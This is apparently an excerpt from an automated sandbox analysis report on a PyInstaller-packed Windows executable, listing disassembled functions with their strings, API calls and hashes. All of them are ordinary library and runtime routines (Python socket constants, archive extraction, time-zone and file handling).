IPPROTO_RAW, xrefs: 00007FFE14631948
NI_NAMEREQD, xrefs: 00007FFE14631F66
IP_ADD_MEMBERSHIP, xrefs: 00007FFE14631BAA
RCVALL_ON, xrefs: 00007FFE1463207C
SHUT_RD, xrefs: 00007FFE14631FA5
SOCK_STREAM, xrefs: 00007FFE14631445
IPPROTO_IPV4, xrefs: 00007FFE146317D2
SO_RCVBUF, xrefs: 00007FFE146315A2
IP_DROP_MEMBERSHIP, xrefs: 00007FFE14631BC0
IPPROTO_ND, xrefs: 00007FFE1463186C
error, xrefs: 00007FFE1463118C
00:00:00:00:00:00, xrefs: 00007FFE14631414
AF_INET6, xrefs: 00007FFE14631380
AI_ALL, xrefs: 00007FFE14631ECF
WSAStartup failed: error code %d, xrefs: 00007FFE14633123
EAI_FAIL, xrefs: 00007FFE14631DE0
BTPROTO_RFCOMM, xrefs: 00007FFE14631404
timeout, xrefs: 00007FFE1463122C
socket, xrefs: 00007FFE1463126F
IPPROTO_RDP, xrefs: 00007FFE146319CC
BDADDR_LOCAL, xrefs: 00007FFE14631435
NI_NUMERICSERV, xrefs: 00007FFE14631F7C
SOL_UDP, xrefs: 00007FFE14631757
TCP_KEEPIDLE, xrefs: 00007FFE14631D5C
IPPROTO_ICMP, xrefs: 00007FFE14631790
EAI_FAMILY, xrefs: 00007FFE14631DF6
IP_OPTIONS, xrefs: 00007FFE14631AE4
MSG_OOB, xrefs: 00007FFE1463164F
MSG_BCAST, xrefs: 00007FFE146316E9
AF_BLUETOOTH, xrefs: 00007FFE146313EE
IPPROTO_IPV6, xrefs: 00007FFE146317E8
AI_NUMERICHOST, xrefs: 00007FFE14631EA3
TCP_FASTOPEN, xrefs: 00007FFE14631D9E
SOL_TCP, xrefs: 00007FFE14631741
EAI_NONAME, xrefs: 00007FFE14631E38
AI_PASSIVE, xrefs: 00007FFE14631E77
AF_UNSPEC, xrefs: 00007FFE14631328
IPPROTO_IGMP, xrefs: 00007FFE146317A6
AF_APPLETALK, xrefs: 00007FFE1463136A
SOCK_RDM, xrefs: 00007FFE1463149D
IPPROTO_TCP, xrefs: 00007FFE146317FE

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Module_$Constant$Object$ConditionMask$Err_$ExceptionInfoStringVerifyVersion$Capsule_Create2DictExitFormatFromLongLong_MallocMem_StartupUnsigned
String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
API String ID: 2280847565-1299366327
Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction ID: ec12e065f9652f400115c193e9096ac47b0c37f823df897dea8d0298ed9a2519
Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
Instruction Fuzzy Hash: E4A2F564B18F8285EA54DB17EC946A423A1BB4BBB9F8460B5CC0E06774DF7CE64DC780

Function 00007FF6399B1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6399B378C
pyi-disable-windowed-traceback, xrefs: 00007FF6399B361D
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6399B3820
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF6399B3A12
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6399B37EF
Failed to start splash screen!, xrefs: 00007FF6399B3933
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6399B3905
_MEIPASS2, xrefs: 00007FF6399B36A2, 00007FF6399B36AE, 00007FF6399B39AC
MEI, xrefs: 00007FF6399B374E
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6399B36FC
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF6399B3A31
pyi-contents-directory, xrefs: 00007FF6399B35F8
Failed to convert DLL search path!, xrefs: 00007FF6399B38A3
pkg, xrefs: 00007FF6399B37CF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6399B391A
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6399B3653
Could not create temporary directory!, xrefs: 00007FF6399B3838
pyi-runtime-tmpdir, xrefs: 00007FF6399B35D3

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: a84c724f8970315ecf749eb304289fe68cb305833295dea569ef4e303eacc2d0
Instruction ID: d364db90be8a388034365462ea5b101bf284894601baf5a18f985379861a1fe4
Opcode Fuzzy Hash: a84c724f8970315ecf749eb304289fe68cb305833295dea569ef4e303eacc2d0
Instruction Fuzzy Hash: EBF15F21A09682A1FB18EF21D5562B96372EF58780F884031DA1DC37DFEF6CE558EB40

Function 00007FF6399D4F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6399D4F55

Part of subcall function 00007FF6399D48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48BC

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

Part of subcall function 00007FF6399C9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6399C9BEF,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399C9C19
Part of subcall function 00007FF6399C9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6399C9BEF,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399C9C3E

_get_daylight.LIBCMT ref: 00007FF6399D4F44

Part of subcall function 00007FF6399D4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D491C

_get_daylight.LIBCMT ref: 00007FF6399D51BA
_get_daylight.LIBCMT ref: 00007FF6399D51CB
_get_daylight.LIBCMT ref: 00007FF6399D51DC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6399D541C), ref: 00007FF6399D5203

Strings

Eastern Standard Time, xrefs: 00007FF6399D52A9
Eastern Summer Time, xrefs: 00007FF6399D52C1

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction ID: 9a813929e3c5294596a21913cb679a5a8ca6ed35b0adb9036ce81672dce53359
Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction Fuzzy Hash: 95D1B226E0824286EB24AF25D8811B9A7A6EF44794F484135EA4DC77DFDF3CE841EB41

Function 00007FF6399D5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D59E9
Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5A67
Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5AB8

CreateFileW.KERNELBASE ref: 00007FF6399D5D7A
CreateFileW.KERNEL32 ref: 00007FF6399D5DCA
GetLastError.KERNEL32 ref: 00007FF6399D5DFA
GetFileType.KERNELBASE ref: 00007FF6399D5E0F
GetLastError.KERNEL32 ref: 00007FF6399D5E19
CloseHandle.KERNEL32 ref: 00007FF6399D5E4C
CloseHandle.KERNEL32 ref: 00007FF6399D5FAF
CreateFileW.KERNEL32 ref: 00007FF6399D5FE4
GetLastError.KERNEL32 ref: 00007FF6399D5FF3

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: afdebeb15a895550b4458c0aa72b691a7a11d9737ac27262835fe35f779caf53
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 91C1C436B28A4286EB10DF69C4906AC3762FB89B98B050235DF1E977DECF38D451DB10

Function 00007FF6399D518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6399D51BA

Part of subcall function 00007FF6399D4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D491C

_get_daylight.LIBCMT ref: 00007FF6399D51CB

Part of subcall function 00007FF6399D48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48BC

_get_daylight.LIBCMT ref: 00007FF6399D51DC

Part of subcall function 00007FF6399D48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48EC

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6399D541C), ref: 00007FF6399D5203

Strings

Eastern Standard Time, xrefs: 00007FF6399D52A9
Eastern Summer Time, xrefs: 00007FF6399D52C1

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction ID: 48919e8359a416c18dea602ca0c19232ddc98d1e972730a6e63117874ca41f16
Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction Fuzzy Hash: E7514B32A0864286E720DF26A8C11B9A7A2BF48784F495135EA4DC77DFDF3CE440AB41

Function 00007FF6399B85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6399B85D3
FindClose.KERNELBASE ref: 00007FF6399B85E2

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: c18358b8fb7d98efa6b0ee9aacd299903054efabc1aa039fcc7eb63f267f4107
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 8BF06222A2D642C6F7A08F60B48976673A1FB84768F080335DA6D427DDDF3CE4599F04

Function 00007FFE146321B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PySys_Audit.PYTHON311 ref: 00007FFE146321CC
GetComputerNameExW.KERNELBASE ref: 00007FFE146321ED
PyUnicode_FromWideChar.PYTHON311 ref: 00007FFE14632204
GetLastError.KERNEL32 ref: 00007FFE1463323A
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FFE14633249

Strings

socket.gethostname, xrefs: 00007FFE146321C5

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: From$AuditCharComputerErr_ErrorLastNameSys_Unicode_WideWindows
String ID: socket.gethostname
API String ID: 1075394898-2650736202
Opcode ID: 7298ead834648a7f4bc6c3e3640df6640e6ed5735f611ada6b462331e5912f76
Instruction ID: a6e69cc5b3e687250f46b69f04b737407391cc0d59a0e25d4e53b61c02b3e479
Opcode Fuzzy Hash: 7298ead834648a7f4bc6c3e3640df6640e6ed5735f611ada6b462331e5912f76
Instruction Fuzzy Hash: C4311021A0CFC682F624DB62A8942BA63A1FF8ABADF444475D54E42774DF3CE44D8790

Function 00007FF6399B18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399B76A0: _fread_nolock.LIBCMT ref: 00007FF6399B774A

_fread_nolock.LIBCMT ref: 00007FF6399B19B4

Part of subcall function 00007FF6399B2760: MessageBoxW.USER32 ref: 00007FF6399B283B

Strings

malloc, xrefs: 00007FF6399B1AA8
Could not read full TOC!, xrefs: 00007FF6399B1AD4
Failed to read cookie!, xrefs: 00007FF6399B19BF
Failed to seek to cookie position!, xrefs: 00007FF6399B1989
fseek, xrefs: 00007FF6399B1990
Could not allocate memory for archive structure!, xrefs: 00007FF6399B19EE
Could not allocate buffer for TOC!, xrefs: 00007FF6399B1AA1
fread, xrefs: 00007FF6399B19C6, 00007FF6399B1ADB
Error on file., xrefs: 00007FF6399B1B0A
calloc, xrefs: 00007FF6399B19F5
MEI, xrefs: 00007FF6399B1931

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: a30161ddcb53f347f25b1f2e6897933f8ffefd05ad1f673dd95f3daa5e00265f
Instruction ID: 0691383bea9f0e564402ace8bcb2032a4ab56525f73c4c7fda01dcd669eb9f9f
Opcode Fuzzy Hash: a30161ddcb53f347f25b1f2e6897933f8ffefd05ad1f673dd95f3daa5e00265f
Instruction Fuzzy Hash: C6716171A18A9689EB60DF14D4902BA23A2EF48784F4C4035D98EC77DFEE2CE545AF40

Function 00007FFDFF165D30 Relevance: 16.6, APIs: 11, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__security_init_cookie.LIBCMT ref: 00007FFDFF165D58
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF165D94
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF165DA2
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF165DB6
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF165DD7

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$__security_init_cookie
String ID:
API String ID: 2363391822-0
Opcode ID: 8f547232962df72e5aab2ed36669f83cd3994ade9ea80b8f5e5f458e81cbbc14
Instruction ID: 8f803c16639c6f9b730150009e8dea33ab06366a12a6581e3d5befd5b88d5f00
Opcode Fuzzy Hash: 8f547232962df72e5aab2ed36669f83cd3994ade9ea80b8f5e5f458e81cbbc14
Instruction Fuzzy Hash: F0414932F0D64386FB585B25E974D786351AF85BA0F184334E93E8A6DEDF2CA8419700

Function 00007FF6399B1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6399B14D9
malloc, xrefs: 00007FF6399B14E0
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B14A9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B146F
fseek, xrefs: 00007FF6399B14B0
fread, xrefs: 00007FF6399B15A1
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B159A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: d87fa84a4aa0b410e303472fda01f2480335fcf3cc3332f0b674b6a0e83d7b1a
Instruction ID: b7f635d2939a4e9c54fc4397f5e1d3c783f9f7279b58712285b08c5a9790cbc6
Opcode Fuzzy Hash: d87fa84a4aa0b410e303472fda01f2480335fcf3cc3332f0b674b6a0e83d7b1a
Instruction Fuzzy Hash: 24414122B0864382EA249F15A8515BA63A2FF54BD4F5C4031DE4E87BDBEE7CE545AB00

Function 00007FFDFF166BCD Relevance: 13.6, APIs: 9, Instructions: 77
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166BE6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF166BFD
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166C0B
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166C1E
